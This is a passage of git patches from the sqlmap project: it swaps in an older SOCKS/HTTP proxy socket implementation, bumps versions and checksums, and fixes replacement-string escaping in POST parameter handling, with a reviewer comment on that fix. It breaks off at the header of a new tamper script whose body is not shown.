- The "type" argument must be either SOCK_STREAM or SOCK_DGRAM. + you must specify family=AF_INET, type=SOCK_STREAM and proto=0. """ - default_proxy = None - - def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, *args, **kwargs): - if type not in (socket.SOCK_STREAM, socket.SOCK_DGRAM): - msg = "Socket type must be stream or datagram, not {!r}" - raise ValueError(msg.format(type)) - - _BaseSocket.__init__(self, family, type, proto, *args, **kwargs) - self._proxyconn = None # TCP connection to keep UDP relay alive - - if self.default_proxy: - self.proxy = self.default_proxy + def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None): + _orgsocket.__init__(self, family, type, proto, _sock) + if _defaultproxy != None: + self.__proxy = _defaultproxy else: - self.proxy = (None, None, None, None, None, None) - self.proxy_sockname = None - self.proxy_peername = None + self.__proxy = (None, None, None, None, None, None) + self.__proxysockname = None + self.__proxypeername = None - def _readall(self, file, count): - """ - Receive EXACTLY the number of bytes requested from the file object. + def __recvall(self, count): + """__recvall(count) -> data + Receive EXACTLY the number of bytes requested from the socket. Blocks until the required number of bytes have been received. 
""" - data = b"" + data = self.recv(count) while len(data) < count: - d = file.read(count - len(data)) - if not d: - raise GeneralProxyError("Connection closed unexpectedly") - data += d + d = self.recv(count-len(data)) + if not d: raise GeneralProxyError((0, "connection closed unexpectedly")) + data = data + d return data - def set_proxy(self, proxy_type=None, addr=None, port=None, rdns=True, username=None, password=None): - """set_proxy(proxy_type, addr[, port[, rdns[, username[, password]]]]) + def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) Sets the proxy to be used. - - proxy_type - The type of the proxy to be used. Three types - are supported: PROXY_TYPE_SOCKS4 (including socks4a), - PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP + proxytype - The type of the proxy to be used. Three types + are supported: PROXY_TYPE_SOCKS4 (including socks4a), + PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP addr - The address of the server (IP or DNS). port - The port of the server. Defaults to 1080 for SOCKS - servers and 8080 for HTTP proxy servers. - rdns - Should DNS queries be performed on the remote side - (rather than the local side). The default is True. - Note: This has no effect with SOCKS4 servers. + servers and 8080 for HTTP proxy servers. + rdns - Should DNS queries be preformed on the remote side + (rather than the local side). The default is True. + Note: This has no effect with SOCKS4 servers. username - Username to authenticate with to the server. - The default is no authentication. + The default is no authentication. password - Password to authenticate with to the server. - Only relevant when username is also provided. + Only relevant when username is also provided. 
""" - self.proxy = (proxy_type, addr, port, rdns, - username.encode() if username else None, - password.encode() if password else None) - - setproxy = set_proxy + self.__proxy = (proxytype, addr, port, rdns, username, password) - def bind(self, *pos, **kw): + def __negotiatesocks5(self, destaddr, destport): + """__negotiatesocks5(self,destaddr,destport) + Negotiates a connection through a SOCKS5 server. """ - Implements proxy connection for UDP sockets, - which happens during the bind() phase. - """ - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - if not proxy_type or self.type != socket.SOCK_DGRAM: - return _orig_socket.bind(self, *pos, **kw) - - if self._proxyconn: - raise socket.error(EINVAL, "Socket already bound to an address") - if proxy_type != SOCKS5: - msg = "UDP only supported by SOCKS5 proxy type" - raise socket.error(EOPNOTSUPP, msg) - _BaseSocket.bind(self, *pos, **kw) - - # Need to specify actual local port because - # some relays drop packets if a port of zero is specified. - # Avoid specifying host address in case of NAT though. 
- _, port = self.getsockname() - dst = ("0", port) - - self._proxyconn = _orig_socket() - proxy = self._proxy_addr() - self._proxyconn.connect(proxy) - - UDP_ASSOCIATE = b"\x03" - _, relay = self._SOCKS5_request(self._proxyconn, UDP_ASSOCIATE, dst) - - # The relay is most likely on the same host as the SOCKS proxy, - # but some proxies return a private IP address (10.x.y.z) - host, _ = proxy - _, port = relay - _BaseSocket.connect(self, (host, port)) - self.proxy_sockname = ("0.0.0.0", 0) # Unknown - - def sendto(self, bytes, *args, **kwargs): - if self.type != socket.SOCK_DGRAM: - return _BaseSocket.sendto(self, bytes, *args, **kwargs) - if not self._proxyconn: - self.bind(("", 0)) - - address = args[-1] - flags = args[:-1] - - header = BytesIO() - RSV = b"\x00\x00" - header.write(RSV) - STANDALONE = b"\x00" - header.write(STANDALONE) - self._write_SOCKS5_address(address, header) - - sent = _BaseSocket.send(self, header.getvalue() + bytes, *flags, **kwargs) - return sent - header.tell() - - def send(self, bytes, flags=0, **kwargs): - if self.type == socket.SOCK_DGRAM: - return self.sendto(bytes, flags, self.proxy_peername, **kwargs) + # First we'll send the authentication packages we support. + if (self.__proxy[4]!=None) and (self.__proxy[5]!=None): + # The username/password details were supplied to the + # setproxy method so we support the USERNAME/PASSWORD + # authentication (in addition to the standard none). 
+ self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02)) else: - return _BaseSocket.send(self, bytes, flags, **kwargs) - - def recvfrom(self, bufsize, flags=0): - if self.type != socket.SOCK_DGRAM: - return _BaseSocket.recvfrom(self, bufsize, flags) - if not self._proxyconn: - self.bind(("", 0)) - - buf = BytesIO(_BaseSocket.recv(self, bufsize, flags)) - buf.seek(+2, SEEK_CUR) - frag = buf.read(1) - if ord(frag): - raise NotImplementedError("Received UDP packet fragment") - fromhost, fromport = self._read_SOCKS5_address(buf) - - if self.proxy_peername: - peerhost, peerport = self.proxy_peername - if fromhost != peerhost or peerport not in (0, fromport): - raise socket.error(EAGAIN, "Packet filtered") - - return (buf.read(), (fromhost, fromport)) - - def recv(self, *pos, **kw): - bytes, _ = self.recvfrom(*pos, **kw) - return bytes - - def close(self): - if self._proxyconn: - self._proxyconn.close() - return _BaseSocket.close(self) - - def get_proxy_sockname(self): - """ + # No username/password were entered, therefore we + # only support connections with no authentication. + self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00)) + # We'll receive the server's response to determine which + # method was selected + chosenauth = self.__recvall(2) + if chosenauth[0:1] != chr(0x05).encode(): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + # Check the chosen authentication method + if chosenauth[1:2] == chr(0x00).encode(): + # No authentication is required + pass + elif chosenauth[1:2] == chr(0x02).encode(): + # Okay, we need to perform a basic username/password + # authentication. 
+ self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5]) + authstat = self.__recvall(2) + if authstat[0:1] != chr(0x01).encode(): + # Bad response + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if authstat[1:2] != chr(0x00).encode(): + # Authentication failed + self.close() + raise Socks5AuthError((3, _socks5autherrors[3])) + # Authentication succeeded + else: + # Reaching here is always bad + self.close() + if chosenauth[1] == chr(0xFF).encode(): + raise Socks5AuthError((2, _socks5autherrors[2])) + else: + raise GeneralProxyError((1, _generalerrors[1])) + # Now we can request the actual connection + req = struct.pack('BBB', 0x05, 0x01, 0x00) + # If the given destination address is an IP address, we'll + # use the IPv4 address request even if remote resolving was specified. + try: + ipaddr = socket.inet_aton(destaddr) + req = req + chr(0x01).encode() + ipaddr + except socket.error: + # Well it's not an IP number, so it's probably a DNS name. 
+ if self.__proxy[3]: + # Resolve remotely + ipaddr = None + req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr + else: + # Resolve locally + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + req = req + chr(0x01).encode() + ipaddr + req = req + struct.pack(">H", destport) + self.sendall(req) + # Get the response + resp = self.__recvall(4) + if resp[0:1] != chr(0x05).encode(): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + elif resp[1:2] != chr(0x00).encode(): + # Connection failed + self.close() + if ord(resp[1:2])<=8: + raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])])) + else: + raise Socks5Error((9, _socks5errors[9])) + # Get the bound address/port + elif resp[3:4] == chr(0x01).encode(): + boundaddr = self.__recvall(4) + elif resp[3:4] == chr(0x03).encode(): + resp = resp + self.recv(1) + boundaddr = self.__recvall(ord(resp[4:5])) + else: + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + boundport = struct.unpack(">H", self.__recvall(2))[0] + self.__proxysockname = (boundaddr, boundport) + if ipaddr != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) + + def getproxysockname(self): + """getsockname() -> address info Returns the bound IP address and port number at the proxy. """ - return self.proxy_sockname + return self.__proxysockname - getproxysockname = get_proxy_sockname - - def get_proxy_peername(self): - """ + def getproxypeername(self): + """getproxypeername() -> address info Returns the IP and port number of the proxy. 
""" - return _BaseSocket.getpeername(self) + return _orgsocket.getpeername(self) - getproxypeername = get_proxy_peername - - def get_peername(self): - """ + def getpeername(self): + """getpeername() -> address info Returns the IP address and port number of the destination - machine (note: get_proxy_peername returns the proxy) - """ - return self.proxy_peername - - getpeername = get_peername - - def _negotiate_SOCKS5(self, *dest_addr): - """ - Negotiates a stream connection through a SOCKS5 server. - """ - CONNECT = b"\x01" - self.proxy_peername, self.proxy_sockname = self._SOCKS5_request(self, - CONNECT, dest_addr) - - def _SOCKS5_request(self, conn, cmd, dst): - """ - Send SOCKS5 request with given command (CMD field) and - address (DST field). Returns resolved DST address that was used. + machine (note: getproxypeername returns the proxy) """ - proxy_type, addr, port, rdns, username, password = self.proxy + return self.__proxypeername - writer = conn.makefile("wb") - reader = conn.makefile("rb", 0) # buffering=0 renamed in Python 3 - try: - # First we'll send the authentication packages we support. - if username and password: - # The username/password details were supplied to the - # set_proxy method so we support the USERNAME/PASSWORD - # authentication (in addition to the standard none). - writer.write(b"\x05\x02\x00\x02") - else: - # No username/password were entered, therefore we - # only support connections with no authentication. 
- writer.write(b"\x05\x01\x00") - - # We'll receive the server's response to determine which - # method was selected - writer.flush() - chosen_auth = self._readall(reader, 2) - - if chosen_auth[0:1] != b"\x05": - # Note: string[i:i+1] is used because indexing of a bytestring - # via bytestring[i] yields an integer in Python 3 - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - # Check the chosen authentication method - - if chosen_auth[1:2] == b"\x02": - # Okay, we need to perform a basic username/password - # authentication. - writer.write(b"\x01" + chr(len(username)).encode() - + username - + chr(len(password)).encode() - + password) - writer.flush() - auth_status = self._readall(reader, 2) - if auth_status[0:1] != b"\x01": - # Bad response - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - if auth_status[1:2] != b"\x00": - # Authentication failed - raise SOCKS5AuthError("SOCKS5 authentication failed") - - # Otherwise, authentication succeeded - - # No authentication is required if 0x00 - elif chosen_auth[1:2] != b"\x00": - # Reaching here is always bad - if chosen_auth[1:2] == b"\xFF": - raise SOCKS5AuthError("All offered SOCKS5 authentication methods were rejected") - else: - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - # Now we can request the actual connection - writer.write(b"\x05" + cmd + b"\x00") - resolved = self._write_SOCKS5_address(dst, writer) - writer.flush() - - # Get the response - resp = self._readall(reader, 3) - if resp[0:1] != b"\x05": - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - status = ord(resp[1:2]) - if status != 0x00: - # Connection failed: server returned an error - error = SOCKS5_ERRORS.get(status, "Unknown error") - raise SOCKS5Error("{0:#04x}: {1}".format(status, error)) - - # Get the bound address/port - bnd = self._read_SOCKS5_address(reader) - return (resolved, bnd) - finally: - reader.close() - writer.close() - - def _write_SOCKS5_address(self, 
addr, file): - """ - Return the host and port packed for the SOCKS5 protocol, - and the resolved address as a tuple object. - """ - host, port = addr - proxy_type, _, _, rdns, username, password = self.proxy - family_to_byte = {socket.AF_INET: b"\x01", socket.AF_INET6: b"\x04"} - - # If the given destination address is an IP address, we'll - # use the IP address request even if remote resolving was specified. - # Detect whether the address is IPv4/6 directly. - for family in (socket.AF_INET, socket.AF_INET6): - try: - addr_bytes = socket.inet_pton(family, host) - file.write(family_to_byte[family] + addr_bytes) - host = socket.inet_ntop(family, addr_bytes) - file.write(struct.pack(">H", port)) - return host, port - except socket.error: - continue - - # Well it's not an IP number, so it's probably a DNS name. - if rdns: - # Resolve remotely - host_bytes = host.encode('idna') - file.write(b"\x03" + chr(len(host_bytes)).encode() + host_bytes) - else: - # Resolve locally - addresses = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP, socket.AI_ADDRCONFIG) - # We can't really work out what IP is reachable, so just pick the - # first. 
- target_addr = addresses[0] - family = target_addr[0] - host = target_addr[4][0] - - addr_bytes = socket.inet_pton(family, host) - file.write(family_to_byte[family] + addr_bytes) - host = socket.inet_ntop(family, addr_bytes) - file.write(struct.pack(">H", port)) - return host, port - - def _read_SOCKS5_address(self, file): - atyp = self._readall(file, 1) - if atyp == b"\x01": - addr = socket.inet_ntoa(self._readall(file, 4)) - elif atyp == b"\x03": - length = self._readall(file, 1) - addr = self._readall(file, ord(length)) - elif atyp == b"\x04": - addr = socket.inet_ntop(socket.AF_INET6, self._readall(file, 16)) - else: - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - port = struct.unpack(">H", self._readall(file, 2))[0] - return addr, port - - def _negotiate_SOCKS4(self, dest_addr, dest_port): - """ + def __negotiatesocks4(self,destaddr,destport): + """__negotiatesocks4(self,destaddr,destport) Negotiates a connection through a SOCKS4 server. """ - proxy_type, addr, port, rdns, username, password = self.proxy - - writer = self.makefile("wb") - reader = self.makefile("rb", 0) # buffering=0 renamed in Python 3 + # Check if the destination address provided is an IP address + rmtrslv = False try: - # Check if the destination address provided is an IP address - remote_resolve = False - try: - addr_bytes = socket.inet_aton(dest_addr) - except socket.error: - # It's a DNS name. Check where it should be resolved. 
- if rdns: - addr_bytes = b"\x00\x00\x00\x01" - remote_resolve = True - else: - addr_bytes = socket.inet_aton(socket.gethostbyname(dest_addr)) - - # Construct the request packet - writer.write(struct.pack(">BBH", 0x04, 0x01, dest_port)) - writer.write(addr_bytes) - - # The username parameter is considered userid for SOCKS4 - if username: - writer.write(username) - writer.write(b"\x00") - - # DNS name if remote resolving is required - # NOTE: This is actually an extension to the SOCKS4 protocol - # called SOCKS4A and may not be supported in all cases. - if remote_resolve: - writer.write(dest_addr.encode('idna') + b"\x00") - writer.flush() - - # Get the response from the server - resp = self._readall(reader, 8) - if resp[0:1] != b"\x00": - # Bad data - raise GeneralProxyError("SOCKS4 proxy server sent invalid data") - - status = ord(resp[1:2]) - if status != 0x5A: - # Connection failed: server returned an error - error = SOCKS4_ERRORS.get(status, "Unknown error") - raise SOCKS4Error("{0:#04x}: {1}".format(status, error)) - - # Get the bound address/port - self.proxy_sockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0]) - if remote_resolve: - self.proxy_peername = socket.inet_ntoa(addr_bytes), dest_port + ipaddr = socket.inet_aton(destaddr) + except socket.error: + # It's a DNS name. Check where it should be resolved. 
+ if self.__proxy[3]: + ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01) + rmtrslv = True else: - self.proxy_peername = dest_addr, dest_port - finally: - reader.close() - writer.close() + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + # Construct the request packet + req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr + # The username parameter is considered userid for SOCKS4 + if self.__proxy[4] != None: + req = req + self.__proxy[4] + req = req + chr(0x00).encode() + # DNS name if remote resolving is required + # NOTE: This is actually an extension to the SOCKS4 protocol + # called SOCKS4A and may not be supported in all cases. + if rmtrslv: + req = req + destaddr + chr(0x00).encode() + self.sendall(req) + # Get the response from the server + resp = self.__recvall(8) + if resp[0:1] != chr(0x00).encode(): + # Bad data + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + if resp[1:2] != chr(0x5A).encode(): + # Server returned an error + self.close() + if ord(resp[1:2]) in (91, 92, 93): + self.close() + raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90])) + else: + raise Socks4Error((94, _socks4errors[4])) + # Get the bound address/port + self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0]) + if rmtrslv != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) - def _negotiate_HTTP(self, dest_addr, dest_port): - """ + def __negotiatehttp(self, destaddr, destport): + """__negotiatehttp(self,destaddr,destport) Negotiates a connection through an HTTP server. - NOTE: This currently only supports HTTP CONNECT-style proxies. 
""" - proxy_type, addr, port, rdns, username, password = self.proxy - # If we need to resolve locally, we do this now - addr = dest_addr if rdns else socket.gethostbyname(dest_addr) - - http_headers = [ - b"CONNECT " + addr.encode('idna') + b":" + str(dest_port).encode() + b" HTTP/1.1", - b"Host: " + dest_addr.encode('idna') - ] - - if username and password: - http_headers.append(b"Proxy-Authorization: basic " + b64encode(username + b":" + password)) - - http_headers.append(b"\r\n") - - self.sendall(b"\r\n".join(http_headers)) - - # We just need the first line to check if the connection was successful - fobj = self.makefile() - status_line = fobj.readline() - fobj.close() - - if not status_line: - raise GeneralProxyError("Connection closed unexpectedly") - - try: - proto, status_code, status_msg = status_line.split(" ", 2) - except ValueError: - raise GeneralProxyError("HTTP proxy server sent invalid response") - - if not proto.startswith("HTTP/"): - raise GeneralProxyError("Proxy server does not appear to be an HTTP proxy") - + if not self.__proxy[3]: + addr = socket.gethostbyname(destaddr) + else: + addr = destaddr + self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode()) + # We read the response until we get the string "\r\n\r\n" + resp = self.recv(1) + while resp.find("\r\n\r\n".encode()) == -1: + resp = resp + self.recv(1) + # We just need the first line to check if the connection + # was successful + statusline = resp.splitlines()[0].split(" ".encode(), 2) + if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) try: - status_code = int(status_code) + statuscode = int(statusline[1]) except ValueError: - raise HTTPError("HTTP proxy server did not return a valid HTTP status") - - if status_code != 200: - error = "{0}: {1}".format(status_code, status_msg) - if status_code in (400, 403, 405): - # It's likely that the HTTP 
proxy server does not support the CONNECT tunneling method - error += ("\n[*] Note: The HTTP proxy server may not be supported by PySocks" - " (must be a CONNECT tunnel proxy)") - raise HTTPError(error) - - self.proxy_sockname = (b"0.0.0.0", 0) - self.proxy_peername = addr, dest_port - - _proxy_negotiators = { - SOCKS4: _negotiate_SOCKS4, - SOCKS5: _negotiate_SOCKS5, - HTTP: _negotiate_HTTP - } - + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if statuscode != 200: + self.close() + raise HTTPError((statuscode, statusline[2])) + self.__proxysockname = ("0.0.0.0", 0) + self.__proxypeername = (addr, destport) - def connect(self, dest_pair): - """ + def connect(self, destpair): + """connect(self, despair) Connects to the specified destination through a proxy. - Uses the same API as socket's connect(). - To select the proxy server, use set_proxy(). - - dest_pair - 2-tuple of (IP/hostname, port). + destpar - A tuple of the IP/DNS address and the port number. + (identical to socket's connect). + To select the proxy server use setproxy(). """ - if len(dest_pair) != 2 or dest_pair[0].startswith("["): - # Probably IPv6, not supported -- raise an error, and hope - # Happy Eyeballs (RFC6555) makes sure at least the IPv4 - # connection works... 
- raise socket.error("PySocks doesn't support IPv6") - - dest_addr, dest_port = dest_pair - - if self.type == socket.SOCK_DGRAM: - if not self._proxyconn: - self.bind(("", 0)) - dest_addr = socket.gethostbyname(dest_addr) - - # If the host address is INADDR_ANY or similar, reset the peer - # address so that packets are received from any peer - if dest_addr == "0.0.0.0" and not dest_port: - self.proxy_peername = None - else: - self.proxy_peername = (dest_addr, dest_port) - return - - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - # Do a minimal input check first - if (not isinstance(dest_pair, (list, tuple)) - or len(dest_pair) != 2 - or not dest_addr - or not isinstance(dest_port, int)): - raise GeneralProxyError("Invalid destination-connection (host, port) pair") - - - if proxy_type is None: - # Treat like regular socket object - self.proxy_peername = dest_pair - _BaseSocket.connect(self, (dest_addr, dest_port)) - return - - proxy_addr = self._proxy_addr() - - try: - # Initial connection to proxy server - _BaseSocket.connect(self, proxy_addr) - - except socket.error as error: - # Error while connecting to proxy - self.close() - proxy_addr, proxy_port = proxy_addr - proxy_server = "{0}:{1}".format(proxy_addr, proxy_port) - printable_type = PRINTABLE_PROXY_TYPES[proxy_type] - - msg = "Error connecting to {0} proxy {1}".format(printable_type, - proxy_server) - raise ProxyConnectionError(msg, error) - + if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int): + raise GeneralProxyError((5, _generalerrors[5])) + if self.__proxy[0] == PROXY_TYPE_SOCKS5: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + _orgsocket.connect(self, (self.__proxy[1], portnum)) + self.__negotiatesocks5(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_SOCKS4: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + 
_orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatesocks4(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_HTTP: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 8080 + _orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatehttp(destpair[0], destpair[1]) + elif self.__proxy[0] == None: + _orgsocket.connect(self, (destpair[0], destpair[1])) else: - # Connected to proxy server, now negotiate - try: - # Calls negotiate_{SOCKS4, SOCKS5, HTTP} - negotiate = self._proxy_negotiators[proxy_type] - negotiate(self, dest_addr, dest_port) - except socket.error as error: - # Wrap socket errors - self.close() - raise GeneralProxyError("Socket error", error) - except ProxyError: - # Protocol error while negotiating with proxy - self.close() - raise - - def _proxy_addr(self): - """ - Return proxy address to connect to as tuple object - """ - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - proxy_port = proxy_port or DEFAULT_PORTS.get(proxy_type) - if not proxy_port: - raise GeneralProxyError("Invalid proxy type") - return proxy_addr, proxy_port + raise GeneralProxyError((4, _generalerrors[4])) + +def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + source_address=None): + # Patched for a DNS-leakage + host, port = address + sock = None + try: + sock = socksocket(socket.AF_INET, socket.SOCK_STREAM) + if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT: + sock.settimeout(timeout) + if source_address: + sock.bind(source_address) + sock.connect(address) + except socket.error: + if sock is not None: + sock.close() + raise + return sock diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8b0280b75a4..fd8bcc9e5bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2adfff188eafd6ea877686823cb44eb9 lib/core/settings.py +2c8a4dcbdeec825ded4f27bd727379e5 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -356,7 +356,7 @@ ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py 5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py -74fcae36f5a2cc440c1717ae8e3f64c4 thirdparty/socks/socks.py +afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py From eb498e6c03d55c273f2a0018185d4db0e0f87662 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 29 May 2018 14:54:43 +0200 Subject: [PATCH 148/428] Fixes #2819 --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1539dcd392b..65c3e8f975c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.22" +VERSION = "1.2.5.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/request/basic.py b/lib/request/basic.py index 0eb60e630a3..931e8becf57 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -386,7 +386,7 @@ def processResponse(page, responseHeaders, status=None): continue conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST]) + conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST]) if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): kb.browserVerification = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fd8bcc9e5bd..24ec8962fb3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2c8a4dcbdeec825ded4f27bd727379e5 lib/core/settings.py +dbf72e4b82773ade88cc34a53f80abcb lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -7a779e6bdf582b8ceb6d640cf869ac10 lib/request/basic.py +62e4500ef19f7795a1443897b535b36d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From 694b5bb5c028c7e7d38b1c94f8788036b54dd737 Mon Sep 17 00:00:00 2001 
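Review bot: The added line still routes `value` through `re.sub`'s replacement-template parsing and compensates by hand with `value.replace('\\', r'\\')`; that is sufficient (every template escape starts with a backslash) but it is easy to lose on the next edit, as the previous `re.escape(value)` shows — `re.escape` quotes for a pattern, not for a replacement, so a value like `a.b` was being written back as `a\.b`. A callable replacement avoids template parsing entirely and needs no escaping: `conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), lambda match: match.group(1) + value, conf.parameters[PLACE.POST])`. If the manual escaping is kept, a comment such as `# value is a replacement string, not a pattern: only backslashes need escaping` would record why `re.escape` must not be used here. `processResponse` starts and continues outside the hunk.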
From: Miroslav Stampar Date: Wed, 30 May 2018 15:48:16 +0200 Subject: [PATCH 149/428] New tamper script (per user request) --- lib/core/settings.py | 2 +- tamper/0x2char.py | 42 ++++++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 3 ++- 3 files changed, 45 insertions(+), 2 deletions(-) create mode 100644 tamper/0x2char.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 65c3e8f975c..624222b0750 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.23" +VERSION = "1.2.5.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/0x2char.py b/tamper/0x2char.py new file mode 100644 index 00000000000..f08a434e59c --- /dev/null +++ b/tamper/0x2char.py 
